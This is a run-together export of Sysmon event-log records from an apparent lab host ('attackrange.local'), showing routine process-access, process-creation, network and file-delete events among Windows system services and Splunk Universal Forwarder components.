09:03:27.979{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-88DF-6151-8B79-00000000FD01}328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977039Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.979{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977038Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.979{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977037Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.979{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977036Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.979{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977035Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.979{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977034Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.979{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977033Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.979{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977032Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.979{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977031Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.979{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977030Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.979{69CF5F33-7F27-614D-0500-00000000FD01}408984C:\Windows\system32\csrss.exe{69CF5F33-88DF-6151-8B79-00000000FD01}328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977029Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.979{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-88DF-6151-8B79-00000000FD01}328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977028Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.964{69CF5F33-88DF-6151-8B79-00000000FD01}328C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{69CF5F33-7F27-614D-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{69CF5F33-7F29-614D-1D00-00000000FD01}1960C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 354300x8000000000000000977027Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:24.764{69CF5F33-7F33-614D-6600-00000000FD01}4076C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-542.attackrange.local59282-false10.0.1.12-8000- 23542300x8000000000000000977026Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.619{69CF5F33-7F3A-614D-7000-00000000FD01}3160NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=53F4205B5BB639DA868F236CC729C2D9,SHA256=3D151A054ACCE435B941EB1788CB9CB096A2B42C9930CC8D45F00EABB499AE8C,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000977025Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.291{69CF5F33-7F2A-614D-2B00-00000000FD01}28562876C:\Windows\system32\conhost.exe{69CF5F33-88DF-6151-8A79-00000000FD01}744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977024Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.291{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977023Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.291{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977022Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.291{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977021Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.291{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977020Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.291{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977019Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.291{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977018Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.276{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977017Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.276{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977016Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.276{69CF5F33-7F28-614D-0C00-00000000FD01}7203228C:\Windows\system32\svchost.exe{69CF5F33-7F28-614D-1A00-00000000FD01}1836C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x8000000000000000977015Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.276{69CF5F33-7F27-614D-0500-00000000FD01}408980C:\Windows\system32\csrss.exe{69CF5F33-88DF-6151-8A79-00000000FD01}744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x8000000000000000977014Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.276{69CF5F33-7F29-614D-1D00-00000000FD01}19603060C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{69CF5F33-88DF-6151-8A79-00000000FD01}744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x8000000000000000977013Microsoft-Windows-Sysmon/Operationalwin-host-542.attackrange.local-2021-09-27 09:03:27.276{69CF5F33-88DF-6151-8A79-00000000FD01}744C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT 